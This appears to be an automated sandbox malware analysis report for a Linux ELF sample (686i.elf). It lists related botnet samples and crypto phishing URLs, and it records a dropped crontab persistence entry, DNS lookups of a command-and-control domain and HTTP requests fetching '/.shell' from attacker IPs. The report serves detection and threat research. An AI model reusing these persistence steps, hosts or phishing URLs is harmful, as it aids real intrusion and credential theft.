                                                        HARMONYHOSTING-ASFRgigab.arm5.elfGet hashmaliciousUnknownBrowse
                                                        • 37.44.238.66
                                                        gigab.mips.elfGet hashmaliciousUnknownBrowse
                                                        • 37.44.238.66
                                                        l7vmra.elfGet hashmaliciousMiraiBrowse
                                                        • 37.44.238.92
                                                        gigab.mips.elfGet hashmaliciousGafgytBrowse
                                                        • 37.44.238.66
                                                        gigab.spc.elfGet hashmaliciousGafgytBrowse
                                                        • 37.44.238.66
                                                        gigab.arm5.elfGet hashmaliciousGafgytBrowse
                                                        • 37.44.238.66
                                                        gigab.arm4.elfGet hashmaliciousGafgytBrowse
                                                        • 37.44.238.66
                                                        gigab.x86.elfGet hashmaliciousGafgytBrowse
                                                        • 37.44.238.66
                                                        gigab.ppc.elfGet hashmaliciousGafgytBrowse
                                                        • 37.44.238.66
                                                        gigab.sh4.elfGet hashmaliciousGafgytBrowse
                                                        • 37.44.238.66
                                                        INIT7CHboatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 109.202.202.202
                                                        boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 109.202.202.202
                                                        boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                        • 109.202.202.202
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 109.202.202.202
                                                        FederalmipsAgent.elfGet hashmaliciousMiraiBrowse
                                                        • 109.202.202.202
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 109.202.202.202
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 109.202.202.202
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 109.202.202.202
                                                        Sakura.sh.binGet hashmaliciousUnknownBrowse
                                                        • 109.202.202.202
                                                        GwRba1mTFR.elfGet hashmaliciousUnknownBrowse
                                                        • 109.202.202.202
                                                        AMAZON-02USna.elfGet hashmaliciousPrometeiBrowse
                                                        • 44.247.155.67
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 44.247.155.67
                                                        boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 34.249.145.219
                                                        https://kukuinlogan.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                        • 52.222.232.144
                                                        https://official-site-coinbase-pro-digital-asse.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                        • 52.222.232.47
                                                        https://trezor-io-start-r---starting-auth.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                        • 52.222.232.99
                                                        https://kucoinrxlogine.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                        • 52.222.232.144
                                                        https://u-sso-coinbasepros-auth.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                        • 52.222.232.39
                                                        https://en--sso---coinbasepro---authh---cdn.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                        • 52.222.232.47
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 44.247.155.67
                                                        No context
                                                        No context
                                                        Process:/usr/bin/crontab
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):210
                                                        Entropy (8bit):5.101450896525499
                                                        Encrypted:false
                                                        SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLvIg4iGMQ5UYLtCFt3eQTbHvn:8QjHig8Mg4UeHLUeQTbHv
                                                        MD5:BCBEEF97EAF46D4CD746DE187D4AAAD4
                                                        SHA1:3EFAD843AF2E6381EE79597B6D6B8E4EB2216D61
                                                        SHA-256:9C9B5BF8F25A61B74DDAEB3EEF59B340CB2B31FF462873B6FB730AFAC37B1B79
                                                        SHA-512:F921D6BA0A5D8B25B3994106197E3480D793C1324DA579FAEF925A69C73EC765008652DAA4CC6A02E3482A1B9DEE659320756F212516ECCA611A6475E13D7DEA
                                                        Malicious:true
                                                        Reputation:low
                                                        Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Mar 18 20:02:25 2025).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).*/15 * * * * /usr/lib/ld-unix.so.2.
                                                        File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
                                                        Entropy (8bit):6.40356591720279
                                                        TrID:
                                                        • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                        • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                        File name:686i.elf
                                                        File size:89'481 bytes
                                                        MD5:913fa2eba99db0a4e78a73ab6dec9da6
                                                        SHA1:a0229e60357b056aa9c89cc8cb1032e4039116b5
                                                        SHA256:af894b758b8edd357ce97f18694b405ca93c6c1e091f6d7457887530edc7c3ef
                                                        SHA512:934aa2e22c2e2347f9b28aa9d53201f1dfadf0ce469a4c7118c1d1dd2235491c16328134e2103a01a25ba94a5f372a99a10b8221b43520257c00c939fd24318b
                                                        SSDEEP:1536:kFPlxndf22h/xxaH333j3kaN1W7N+YRApCM59G7sgQ+bEpnnnOps:kFPlxndf22h/xwXnTkai7MYRApCg9dgs
                                                        TLSH:A7932A4BFA02CBB3D88317F502AB976A5730BD3A592B8E45F3687CB8BB215C87114355
                                                        File Content Preview:.ELF....................h...4....2......4. ...(......................!...!...............!..........|...`-..........Q.td............................U..S.......[1...h........[]...$.............U......=`....t..1....$......$.......u........t...$...........`.

                                                        Download Network PCAP: filteredfull

                                                        • Total Packets: 21
                                                        • 443 (HTTPS)
                                                        • 80 (HTTP)
                                                        • 53 (DNS)
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 19, 2025 02:02:25.342233896 CET4433925634.249.145.219192.168.2.23
                                                        Mar 19, 2025 02:02:25.342735052 CET39256443192.168.2.2334.249.145.219
                                                        Mar 19, 2025 02:02:25.347465992 CET4433925634.249.145.219192.168.2.23
                                                        Mar 19, 2025 02:02:26.064747095 CET43928443192.168.2.2391.189.91.42
                                                        Mar 19, 2025 02:02:27.591706991 CET44388443192.168.2.2337.44.238.88
                                                        Mar 19, 2025 02:02:27.591747046 CET4434438837.44.238.88192.168.2.23
                                                        Mar 19, 2025 02:02:27.591799974 CET44388443192.168.2.2337.44.238.88
                                                        Mar 19, 2025 02:02:27.591851950 CET5339480192.168.2.2337.44.238.88
                                                        Mar 19, 2025 02:02:27.596637964 CET805339437.44.238.88192.168.2.23
                                                        Mar 19, 2025 02:02:27.596694946 CET5339480192.168.2.2337.44.238.88
                                                        Mar 19, 2025 02:02:27.596715927 CET5339480192.168.2.2337.44.238.88
                                                        Mar 19, 2025 02:02:27.602663040 CET805339437.44.238.88192.168.2.23
                                                        Mar 19, 2025 02:02:29.239422083 CET805339437.44.238.88192.168.2.23
                                                        Mar 19, 2025 02:02:29.239517927 CET5339480192.168.2.2337.44.238.88
                                                        Mar 19, 2025 02:02:29.244429111 CET805339437.44.238.88192.168.2.23
                                                        Mar 19, 2025 02:02:42.190457106 CET4251680192.168.2.23109.202.202.202
                                                        Mar 19, 2025 02:02:46.285897017 CET43928443192.168.2.2391.189.91.42
                                                        Mar 19, 2025 02:03:27.240255117 CET43928443192.168.2.2391.189.91.42
                                                        Mar 19, 2025 02:03:29.288072109 CET44388443192.168.2.2337.44.238.88
                                                        Mar 19, 2025 02:03:29.288161993 CET4434438837.44.238.88192.168.2.23
                                                        Mar 19, 2025 02:03:29.288244009 CET44388443192.168.2.2337.44.238.88
                                                        Mar 19, 2025 02:03:34.291826963 CET51798443192.168.2.2337.44.238.92
                                                        Mar 19, 2025 02:03:34.291929007 CET4435179837.44.238.92192.168.2.23
                                                        Mar 19, 2025 02:03:34.291992903 CET51798443192.168.2.2337.44.238.92
                                                        Mar 19, 2025 02:03:34.292037010 CET3613880192.168.2.2337.44.238.92
                                                        Mar 19, 2025 02:03:34.296832085 CET803613837.44.238.92192.168.2.23
                                                        Mar 19, 2025 02:03:34.296930075 CET3613880192.168.2.2337.44.238.92
                                                        Mar 19, 2025 02:03:34.296930075 CET3613880192.168.2.2337.44.238.92
                                                        Mar 19, 2025 02:03:34.301678896 CET803613837.44.238.92192.168.2.23
                                                        Mar 19, 2025 02:03:42.716706038 CET803613837.44.238.92192.168.2.23
                                                        Mar 19, 2025 02:03:42.717134953 CET3613880192.168.2.2337.44.238.92
                                                        Mar 19, 2025 02:03:42.722160101 CET803613837.44.238.92192.168.2.23
                                                        Mar 19, 2025 02:04:30.488691092 CET4435179837.44.238.92192.168.2.23
                                                        Mar 19, 2025 02:04:30.488976002 CET51798443192.168.2.2337.44.238.92
                                                        Mar 19, 2025 02:04:30.489053011 CET4435179837.44.238.92192.168.2.23
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 19, 2025 02:02:27.522531033 CET4716453192.168.2.231.1.1.1
                                                        Mar 19, 2025 02:02:27.591515064 CET53471641.1.1.1192.168.2.23
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Mar 19, 2025 02:02:27.522531033 CET192.168.2.231.1.1.10x8581Standard query (0)conn.masjesu.zipA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Mar 19, 2025 02:02:27.591515064 CET1.1.1.1192.168.2.230x8581No error (0)conn.masjesu.zip37.44.238.92A (IP address)IN (0x0001)false
                                                        Mar 19, 2025 02:02:27.591515064 CET1.1.1.1192.168.2.230x8581No error (0)conn.masjesu.zip37.44.238.88A (IP address)IN (0x0001)false
                                                        • 37.44.238.88
                                                        • 37.44.238.92
                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        0192.168.2.235339437.44.238.8880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 19, 2025 02:02:27.596715927 CET75OUTGET /.shell HTTP/1.1
                                                        Host: 37.44.238.88
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1192.168.2.233613837.44.238.9280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 19, 2025 02:03:34.296930075 CET75OUTGET /.shell HTTP/1.1
                                                        Host: 37.44.238.92
                                                        Connection: close


                                                        System Behavior

                                                        Start time (UTC):01:02:24
                                                        Start date (UTC):19/03/2025
                                                        Path:/usr/bin/dash
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):01:02:24
                                                        Start date (UTC):19/03/2025
                                                        Path:/usr/bin/rm
                                                        Arguments:rm -f /tmp/tmp.snUMMXyMK3 /tmp/tmp.9Qhnz4zPF4 /tmp/tmp.6fTXHNmO0K
                                                        File size:72056 bytes
                                                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                        Start time (UTC):01:02:24
                                                        Start date (UTC):19/03/2025
                                                        Path:/usr/bin/dash
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):01:02:24
                                                        Start date (UTC):19/03/2025
                                                        Path:/usr/bin/rm
                                                        Arguments:rm -f /tmp/tmp.snUMMXyMK3 /tmp/tmp.9Qhnz4zPF4 /tmp/tmp.6fTXHNmO0K
                                                        File size:72056 bytes
                                                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                        Start time (UTC):01:02:25
                                                        Start date (UTC):19/03/2025
                                                        Path:/tmp/686i.elf
                                                        Arguments:/tmp/686i.elf
                                                        File size:89481 bytes
                                                        MD5 hash:913fa2eba99db0a4e78a73ab6dec9da6

                                                        Start time (UTC):01:02:25
                                                        Start date (UTC):19/03/2025
                                                        Path:/tmp/686i.elf
                                                        Arguments:-
                                                        File size:89481 bytes
                                                        MD5 hash:913fa2eba99db0a4e78a73ab6dec9da6

                                                        Start time (UTC):01:02:25
                                                        Start date (UTC):19/03/2025
                                                        Path:/tmp/686i.elf
                                                        Arguments:-
                                                        File size:89481 bytes
                                                        MD5 hash:913fa2eba99db0a4e78a73ab6dec9da6

                                                        Start time (UTC):01:02:25
                                                        Start date (UTC):19/03/2025
                                                        Path:/bin/sh
                                                        Arguments:sh -c "crontab -l"
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):01:02:25
                                                        Start date (UTC):19/03/2025
                                                        Path:/bin/sh
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):01:02:25
                                                        Start date (UTC):19/03/2025
                                                        Path:/usr/bin/crontab
                                                        Arguments:crontab -l
                                                        File size:43720 bytes
                                                        MD5 hash:66e521d421ac9b407699061bf21806f5

                                                        Start time (UTC):01:02:25
                                                        Start date (UTC):19/03/2025
                                                        Path:/tmp/686i.elf
                                                        Arguments:-
                                                        File size:89481 bytes
                                                        MD5 hash:913fa2eba99db0a4e78a73ab6dec9da6

                                                        Start time (UTC):01:02:25
                                                        Start date (UTC):19/03/2025
                                                        Path:/bin/sh
                                                        Arguments:sh -c "crontab -"
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):01:02:25
                                                        Start date (UTC):19/03/2025
                                                        Path:/bin/sh
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):01:02:25
                                                        Start date (UTC):19/03/2025
                                                        Path:/usr/bin/crontab
                                                        Arguments:crontab -
                                                        File size:43720 bytes
                                                        MD5 hash:66e521d421ac9b407699061bf21806f5

                                                        Start time (UTC):01:02:26
                                                        Start date (UTC):19/03/2025
                                                        Path:/tmp/686i.elf
                                                        Arguments:-
                                                        File size:89481 bytes
                                                        MD5 hash:913fa2eba99db0a4e78a73ab6dec9da6

                                                        Start time (UTC):01:02:26
                                                        Start date (UTC):19/03/2025
                                                        Path:/tmp/686i.elf
                                                        Arguments:-
                                                        File size:89481 bytes
                                                        MD5 hash:913fa2eba99db0a4e78a73ab6dec9da6

                                                        Start time (UTC):01:02:26
                                                        Start date (UTC):19/03/2025
                                                        Path:/tmp/686i.elf
                                                        Arguments:-
                                                        File size:89481 bytes
                                                        MD5 hash:913fa2eba99db0a4e78a73ab6dec9da6